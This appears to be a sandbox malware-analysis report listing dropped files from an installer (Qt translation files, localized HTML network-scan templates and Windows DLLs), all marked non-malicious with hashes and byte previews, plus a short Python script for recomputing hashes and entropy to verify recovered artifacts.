                                                                                                                                                                                                  SHA-512:1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22516
                                                                                                                                                                                                  Entropy (8bit):5.64342773223904
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
                                                                                                                                                                                                  MD5:C09D31E3E2A0F6B673F8B26AA49B8E9E
                                                                                                                                                                                                  SHA1:829B459D3642E84D0F0E0AE30D16203C583B1A88
                                                                                                                                                                                                  SHA-256:30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
                                                                                                                                                                                                  SHA-512:DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28199
                                                                                                                                                                                                  Entropy (8bit):4.76848600543852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7zGw8sjK6qVziPNAsFApjRkBmPNsGYR8XQrjxpi5Qg7C/XoVsLf7ra3sEYUq:3Gw8B6qVePNAPjuYPNHAnxW7qoVsLff
                                                                                                                                                                                                  MD5:7C52599AA9F2C07DCC95378CA4BECD86
                                                                                                                                                                                                  SHA1:73831CA352BED5C6764BCB544301396C55706E6D
                                                                                                                                                                                                  SHA-256:B495F4FF61EBB88402BCD068BFD3C7EAD171CABE68C9312280F1EBAA32CCEB6F
                                                                                                                                                                                                  SHA-512:340EFFF03017538F010D7FB83BE1407E255D479A41B177189220F5D1D8D4BB6E3F668473AAAB35BFD7D8FA4742FC970E061AD0F16A1E3AE5D28DB1F0958DF1EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1158
                                                                                                                                                                                                  Entropy (8bit):4.839285803199877
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
                                                                                                                                                                                                  MD5:1D24AAD630182B5018D26EE86FF9E1E5
                                                                                                                                                                                                  SHA1:D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
                                                                                                                                                                                                  SHA-256:ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
                                                                                                                                                                                                  SHA-512:D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
                                                                                                                                                                                                  Malicious:false
Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):1246
Entropy (8bit):5.138597371923522
Encrypted:false
SSDEEP:24:lFo/rhtCtunH/XqHH39/g/0Kt5RGDIygReEhyv:HuStyfXqHHN/g/0U2DIPs
MD5:280FFC27B6422BD266F49BE7798DB4D9
SHA1:203F0E4D50B553133531D25727397417BBABAA7B
SHA-256:5DC9054AD67076F853743C7512BEC17071EF732A13B6BE5D0C18A39F7DBF32C6
SHA-512:B446D3B2C1FA4F4D04AD62CAE6AC64023054B32669912B1586950B6C80751F99968AF7AA759EF05826D88BDB6670A1737717A1854872BF4214220BAEAC8C3311
Malicious:false
Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.......... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP-......:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC-......:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>........:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):1184
Entropy (8bit):5.02025670297611
Encrypted:false
SSDEEP:24:lFo6jdsuSxFhXqNHidEy0Kt5RGDFE0GReEhyv:HZdsRDhXqNHidZ0U2DFE0ks
MD5:5B2A97F16B2382930301E6C2C8BFF7A7
SHA1:C66302E72DD2C5561D6187FA4276D78063915693
SHA-256:EDB89B8D25039530B47B0893A14CA803CE2DAF9A2358489ED3C335595B1B79DF
SHA-512:48C67FE96D43FE255156AA3DC94BFC8A6D57B39FC91B1CEF2B498CAC6914DBABB76CF32F193EF897182C6EACA3334D374B12AD53BC2242628E930A7B73C65BFC
Malicious:false
Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tr.ng th.i:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>H. .i.u h.nh:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Nh. s.n xu.t:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Ng..i d.ng:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Ki.u:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Ng.y:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Nh.n x.t:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>D.ch v.</center></b></t

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):26044
Entropy (8bit):5.23160860836295
Encrypted:false
SSDEEP:384:USrTnWGBewzY6ek4qnVBarz5QVZSp8R0SRWEN8ejwVRH9Pkq0+u3lZR:U6bWGBe96YqVBarz5QVZ1pRDOeIJtKT
MD5:D7B6ACB98C438672B2D6E2DA7720191D
SHA1:3F2CCE40CA80158F1A24258309E78978A8915C85
SHA-256:DDB5D2E12292BF444B24067E959DE8EB60F7158C1FD7717433739B3E3752B539
SHA-512:ECCE6C5D0BE732DB27EAF8AD76D425AEC6A852DC41F9501CCAF2E755B7EE42735291FB199139A196DBC017A33B2CC54018CDE8E044E1E7C972C23506C75ACB6D
Malicious:false
Preview:<.d....!..`...B..........R....;...L...;.......;.......;...m...;..>....O..U....[..Q0...^..+....^..Mx..(5...{..G.......H,..J...K...:...N:...b..V...?{.._...V4......%.......J....y..KI......................RV...t..'7...t..K....t..T......;....j......5t......@...=Q..H5..S...f...,.......@,.......G...........~.......`..2....e..TM......Ts.......h. =...A#.*.y.....*.y...Y.*.%..!..*.0..!..+.......+.......+....V.+......+....#..G.......G....'..H0...T..Hw9...Y.Hw9.....I....%t.J6......J6......J6....p.J6...C..LD....t.L.b..T..M.S..<..R.......V....,M.Wi...S..W.T...5.Z.|..Ls.[f3..O..gc......w0K..B*..H...".......U....T...I..."..0....~..2~.. d..@....T..*...2...........St......Y-.9.E..;:.L.#..[..M$o.....e.......l8...2....^..C...I....2......=~......M3......S3..>......>...L..3..+...l...E.......5Z.5.l..XK.AV...%5.y....Q....0..M.......L.......R...tb..1.......................N1......8h......I..(....M..1V...&B.R....-..W.<..X..f.~...D......04..1........^..1....5...y..........c..@..;6...Z=.q.J..JF..I.......I

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):29651
Entropy (8bit):5.330350785151233
Encrypted:false
SSDEEP:768:ct97WPG5jbwTDnrXEPbfsDabKB2DsGM+04nMngRQpf5bLmdwmtPKP:8RWPU8nr0PY2hsGXnqxO3No
MD5:E1A891010B901FE6055532E588E20293
SHA1:167F62B548D6628FC1B989F6FD232BD362B59C23
SHA-256:B20FC1BFC15F157CBDF4C04E8ABF7058FBE4549BFD92A7415A424D8BB5B8BF35
SHA-512:AF0B8A085724DA971FF23228FAC2B04A5BF788FC3CFAD3481EF6E24A71E52348809A5E76BE287D68651F877F2A22391DE474140E8063DC1454678719B98E46F4
Malicious:false
Preview:<.d....!..`...B..........^....;.......;...e...;..!....;..#....;..H....O..a....[..]D...^..3....^..X...(5...A..G....F..H,..U...K...D...N:..!V..V...I..._...c,......,"......U....y..Ve......................^....t.......t..V....t..ag.....E....j..!...5t...K..@...G...H5.._q..f...3.......J................y...~..6....`..;....e..`.......`.......... =...K..*.y...,.*.y.....*.%..'..*.0..'..+.......+.......+......+....V.+....)..G...."..G.....m.H0...a).Hw9.....Hw9.....I....+..J6......J6....r.J6......J6...NQ.LD....J.L.b..a..M.S..F,.R.......V....3..Wi...`r.W.T...q.Z.|..W..[f3..[..gc......w0K..L...H...(.......b....T...q..."..8....~..;... d..J....T..1...2..........._.......f..9.E..E0.L.#..i..M$o.....e.......l8...:....^..N...I....f......G.......X......._...>......>...N..3..3#..l...P.......>..5.l..e..AV...+c.y....]....0..Yj......X[......_/..tb..9b.......c..............Y.......B.......TZ.(....Y..1V...,..R....5..W.<..f!.f.~..$t......8 ..1........^..9....5..........<...c..KF.;6...g..q.J..U@..I.......I

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):327208
Entropy (8bit):6.804582730583226
Encrypted:false
SSDEEP:6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
MD5:72B2E7A9AF236E5CA0C27107E8C5690C
SHA1:6AC273911118C7CAA71818C55E22D27B4C36B843
SHA-256:725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
SHA-512:C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8.*8...8..9...8..9...8..9...8..9...8...9...8...9...8...8..8...9...8...9...8..F8...8...8...8...9...8Rich...8................PE..L...t.%^...........!.....z...j......T.....................................................@..........................}...k..............................(........7...a..T....................b.......a..@............................................text....x.......z.................. ..`.rdata...............~..............@..@.data...............................@....rsrc...............................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):1155
Entropy (8bit):4.8635515480686085
Encrypted:false
SSDEEP:24:lFozSsuSxXqXH0k9/Ue/0Kt5RGD4ReEhyv:HESsRxXqXHBUM0U2DSs
MD5:E63975AFFC0CFD1416D93982E6E0C0E8
SHA1:28F0F8996D128E8095BE958B32F245F1EBB90D60
SHA-256:6B385410B01F24D20294E1B92E7D391F20D146A0AAB937809483C8ED624017CA
SHA-512:2DE0EA4CF7C1B0FBB3375A2E46677E48C7CE967954ED19B9B43DCACA462960A55969E6EB7FA51E12656F812C6768CA1E135007111BD4AAA31055847F229656D5
Malicious:false
Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Durum:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..letim sistemi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.retici:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kullan.c.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.r:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tarih:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Yorumlar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Hizmet</center></b></td><td><b><center>Ayr.nt.lar</

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):1153
Entropy (8bit):4.877089271030429
Encrypted:false
SSDEEP:12:AMJnuKoB2kV2B2uT2Bw2MKb2t52HcqQ2RCz282n0Kt1RhRGDbVzY1OzAkReEiWyv:lFosFsuS5XqiHJlL0Kt5RGDxReEhyv
MD5:1D0D5C190B173CB0BED10C8B2E0F9697
SHA1:83C10675F5A010668F4A278115BBC120F70EC99B
SHA-256:F45A1EFA7DE1EE6ABA559166B744E6398A5BF5233EE3954E0A4BD3EB0904CE3F
SHA-512:94E47E83159A43849DC269936D2B5E4866FB0C84DFDBB02664018CFCDBEDE06179F32324EE236910B4E2FEADC110F39EFD083A0F95B221E1D48A41A35E2C37FF
Malicious:false
Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robce:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ivatel:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Pozn.mky:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnosti</ce

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1151016
Entropy (8bit):6.482547207070433
Encrypted:false
SSDEEP:24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
MD5:ED04DAB88E70661E4980A284B0DF6A0C
SHA1:C1499360A68FDC12013A6CBB35C05A3098E95F41
SHA-256:9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
SHA-512:E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
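The records above each list the same fields for a dropped file: Size, Entropy (8bit), MD5/SHA1/SHA-256/SHA-512, a File Type string and a byte preview. When you pull the corresponding artifacts off an infected host, the practical check is to recompute those fields locally and compare them against the report, so that a renamed or re-downloaded file is not mistaken for the one the sandbox actually saw. The script below is an added example written for this page; it is not Joe Sandbox code and not part of the analysed installer. The Qt .qm magic and the PE IMAGE_FILE_DLL characteristic bit are public format constants; guess_type() is a deliberately small stand-in for libmagic (it only covers the three kinds of file dropped here), and every sample input, including the 88-byte PE header stub, is constructed in the file.

```python
"""
Added example, not code from the Joe Sandbox report or from the analysed sample.
Recomputes the per-file fields of a dropped-file record (Size, Entropy (8bit),
MD5/SHA1/SHA-256/SHA-512, a coarse File Type guess) and checks a local artifact
against hash lines copied from such a record. All sample inputs are constructed here.
"""
import hashlib
import math
import struct
from collections import Counter

# Magic that opens every compiled Qt translation (.qm) file (public Qt constant).
QM_MAGIC = bytes.fromhex("3cb86418caef9c95cd211cbf60a1bddd42")
IMAGE_FILE_DLL = 0x2000          # Characteristics bit in the PE file header
IMAGE_FILE_MACHINE_I386 = 0x14C  # shown as "Intel 80386" in the report's File Type


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the byte histogram, i.e. the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def guess_type(data: bytes) -> str:
    """Magic-based type guess covering the three kinds of file dropped on this page."""
    if data.startswith(QM_MAGIC):
        return "Qt Translation file"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0" and len(data) >= e_lfanew + 24:
            # IMAGE_FILE_HEADER follows "PE\0\0": Machine, NumberOfSections, TimeDateStamp,
            # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
            machine, *_, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
            kind = "DLL" if characteristics & IMAGE_FILE_DLL else "executable"
            arch = "Intel 80386" if machine == IMAGE_FILE_MACHINE_I386 else f"machine 0x{machine:04X}"
            return f"PE32 {kind} {arch}"
        return "MS-DOS executable"
    if data[:64].lstrip().lower().startswith((b"<hr>", b"<html", b"<!doctype html")):
        return "HTML document"
    return "data"


def profile(data: bytes) -> dict:
    """The per-file fields a dropped-file record lists; hashes upper-cased like the report."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "type": guess_type(data),
    }


def matches_report(data: bytes, expected: dict) -> dict:
    """Compare a local artifact with hash values copied from a record.

    expected maps 'md5' / 'sha1' / 'sha256' / 'sha512' to the report's hex string.
    Any False means the file on disk is not the one the sandbox saw (or a value was mistyped).
    """
    got = profile(data)
    return {alg: got[alg] == value.strip().upper() for alg, value in expected.items() if alg in got}


def build_minimal_pe(characteristics: int) -> bytes:
    """Constructed 88-byte MZ/PE header stub (not a real binary) used as sample input."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after the DOS header
    file_header = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 0, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + file_header


if __name__ == "__main__":
    # Constructed stand-ins for the three file kinds in the records above.
    samples = {
        "constructed_dll.dll": build_minimal_pe(0x2102),
        "constructed_qm.qm": QM_MAGIC + b"\0" * 16,
        "constructed_template.html": b"<hr>\r\n<h3>{name}</h3>\r\n",
    }
    for name, blob in samples.items():
        p = profile(blob)
        print(f"{name}: {p['type']}, {p['size']} bytes, entropy {p['entropy']:.3f}, SHA-256 {p['sha256']}")
```

To verify a recovered artifact, read it in binary mode and pass the MD5/SHA-256 strings from its record to matches_report(); treat any False as "different file" rather than as a tolerable discrepancy. As a rule of thumb, the entropy values in these records (around 5 for the HTML templates and 6.5 to 6.8 for the DLLs) are what plain text and ordinary compiled code look like; a whole-file value approaching 8 would point at packed or encrypted content and justify a closer look even when the AV detection column reads 0%.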
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21184
                                                                                                                                                                                                  Entropy (8bit):6.98505637818331
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                                                                                                                                  MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                                                                                                                                  SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                                                                                                                                  SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                                                                                                                                  SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20672
                                                                                                                                                                                                  Entropy (8bit):6.936138213943514
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
                                                                                                                                                                                                  MD5:88C4CA509C947509E123F22E5F077639
                                                                                                                                                                                                  SHA1:AE837C556FF23B9E166288A11E409D21BDDDA4ED
                                                                                                                                                                                                  SHA-256:0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
                                                                                                                                                                                                  SHA-512:3CCE8C4EA63019ADC6383D5DA7F5969B0B10A55CEEF29083E21F04D23377305325C5CB5F4656955F8ABB5A1E10BEEAC60808DE9D03A72462950469AE49768418
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......a.....@.............................V............ ...................<..............8............................................................................text...f........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28132
                                                                                                                                                                                                  Entropy (8bit):4.6803756692053184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:n3mvi1M9EsRNmRi55piCisjj7zBR0nD/NoK3ZNvIgN7lQQlddoAtrHquy+G:WHEsRh97FR0nDFo0ZNDWQlduR
                                                                                                                                                                                                  MD5:2DB27B87481EDE8D4FE8C92431A5C5AC
                                                                                                                                                                                                  SHA1:0FFF475A4C88E59550B83CC1F8BBC1F3A28BFC38
                                                                                                                                                                                                  SHA-256:A3881D35EE46708B0A84D512E96981D7DF563A3C547416376B7BEAF874A3946B
                                                                                                                                                                                                  SHA-512:B235CA5CADB26C9A5225CB968BB75B874A8ECAFEC3E72303FE92499A357FB7D1894C4352E6CABDDC833C9552643D2E58A67EEDF22780573674AA0D19DC84615A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Y....;.......;...O...;.. K...;.."%...;..D....O..\....[..Xh...^..0....^..T,..(5......G.......H,..Q...K...@...N:......V...E..._...].......).......Q[...y..Q.......................Y....t..+....t..RD...t..\+.....A....j.. ...5t......@...C...H5..ZU..f...0.......F................E...~..3....`..8d...e..[.......[........t. =...G..*.y.....*.y.....*.%..%..*.0..%..+.....{.+.....0.+......+....h.+....'u.G....!+.G....+..H0...\..Hw9.....Hw9...Q.I....)r.J6......J6....>.J6......J6...JY.LD......L.b..\X.M.S..BR.R.......V....1..Wi...[L.W.T...5.Z.|..S..[f3..V..gc....z.w0K..H...H...&.......]<...T...q..."..5....~..7... d..G....T../I..2....e......Z.......a..9.E..AL.L.#..c..M$o.....e.....B.l8...7....^..J...I....b......C.......S.......Z}..>...y..>......3..0q..l...L.......;..5.l..`..AV...)'.y....X....0..T.......S.......Z...tb..6........I..............U.......>p......O..(....TR.1V...*h.R....2..W.<..`..f.~..".......5`..1........^..7....5..............c..G^.;6...b?.q.J..P...I....s..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27091
                                                                                                                                                                                                  Entropy (8bit):4.712868636230012
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WnNvji4/oUBfrXnBZRxyS/ROxXU9wpDPogAD0+q4:sjgUBfrXBZRxy4RZID2
                                                                                                                                                                                                  MD5:9D3E23BE36601D3604F9F370942DAA55
                                                                                                                                                                                                  SHA1:AE2ABAC157B6AB18E590F20B35568F03E5FA7A67
                                                                                                                                                                                                  SHA-256:0C5513FF8480C5A7372274E88581D13F89F4066DE5372C56C4220FCAB4C53D85
                                                                                                                                                                                                  SHA-512:3D93C6C33AB9EAA998BDFB1CB8384B7CA111EFF8D39DED2D9FD00CDB3588D6352C5A20CE08AA93704B4734AF61F8E8201FCFEA0D8EB984DAFF0FE888AE73B1E7
                                                                                                                                                                                                  Malicious:false
